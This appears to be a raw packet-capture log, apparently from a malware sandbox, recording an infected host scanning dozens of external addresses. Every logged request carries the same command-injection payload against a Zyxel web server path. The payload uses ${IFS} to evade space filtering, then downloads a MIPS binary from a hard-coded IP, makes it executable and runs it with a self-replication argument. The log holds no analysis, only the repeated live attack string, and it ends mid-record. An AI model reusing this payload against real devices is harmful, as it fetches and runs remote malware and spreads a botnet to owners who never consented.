                                            Feb 2, 2024 06:21:04.471621037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2165192.168.2.1536600168.118.214.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471656084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2166192.168.2.1553532121.214.139.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471692085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2167192.168.2.154223465.216.166.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471714973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2168192.168.2.1554332130.236.177.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471760988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2169192.168.2.1549946124.67.2.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471760988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2170192.168.2.154917484.60.16.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471787930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2171192.168.2.153948046.76.84.43443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471837997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2172192.168.2.154766089.182.28.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471903086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2173192.168.2.1554538211.171.119.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471920013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2174192.168.2.1554288132.76.47.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.471966028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2175192.168.2.154908876.62.13.44443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472021103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2176192.168.2.1545746116.33.210.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472043991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2177192.168.2.155449435.146.185.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472162008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2178192.168.2.1534566122.151.145.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472192049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2179192.168.2.155606246.19.93.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472225904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2180192.168.2.153419824.10.178.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472259045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2181192.168.2.1550204152.151.146.114443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472290039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2182192.168.2.154688420.232.89.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472326040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2183192.168.2.154318284.118.134.198443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472354889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2184192.168.2.154313850.229.19.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472389936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2185192.168.2.153612482.158.135.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472417116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2186192.168.2.1558318155.116.188.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472459078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2187192.168.2.154673257.140.197.222443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472489119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2188192.168.2.154491664.133.16.131443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472522974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2189192.168.2.155181279.251.132.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472562075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2190192.168.2.1534264177.222.151.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472604036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2191192.168.2.1539102108.136.88.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472649097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2192192.168.2.1553754120.170.135.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472692013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2193192.168.2.1552302147.50.208.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472718000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2194192.168.2.1539818181.104.1.236443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472759008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2195192.168.2.155878842.38.119.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472784996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2196192.168.2.1550128212.149.186.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472804070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2197192.168.2.1538294197.123.206.125443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472867966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2198192.168.2.1540840130.92.220.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472903013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2199192.168.2.1538248197.167.67.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472923994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2200192.168.2.153397079.126.86.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.472961903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2201192.168.2.154373658.119.230.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473000050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2202192.168.2.1543462222.111.69.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473047972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2203192.168.2.1547954170.84.183.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473099947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2204192.168.2.1547478166.151.120.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473129034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2205192.168.2.1560236120.178.128.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473161936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2206192.168.2.1550470200.107.191.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473205090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2207192.168.2.153448271.245.178.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473222971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2208192.168.2.1539642121.150.252.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473290920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2209192.168.2.1545974102.235.209.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473309994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2210192.168.2.154902023.7.118.94443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473365068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2211192.168.2.1534068137.161.69.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473406076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2212192.168.2.1550324154.23.48.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473431110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2213192.168.2.1546198172.117.43.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473470926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2214192.168.2.156051079.57.98.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473506927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2215192.168.2.1537180158.69.205.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473536968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2216192.168.2.156031636.85.208.14443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473597050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2217192.168.2.154772239.130.20.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473618984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2218192.168.2.1552436129.135.192.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473663092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2219192.168.2.1555984172.201.117.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473705053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2220192.168.2.1540330151.214.59.29443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473730087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2221192.168.2.154634420.99.234.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473778963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2222192.168.2.1559026144.193.171.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473799944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2223192.168.2.1552172223.125.211.220443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473834991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2224192.168.2.1546926154.113.179.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473895073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2225192.168.2.1543230152.174.213.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473933935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2226192.168.2.1557336194.200.67.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473948002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2227192.168.2.155430448.176.152.191443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:04.473982096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            2228192.168.2.1549284220.29.76.37443
                                            TimestampBytes transferredDirectionData
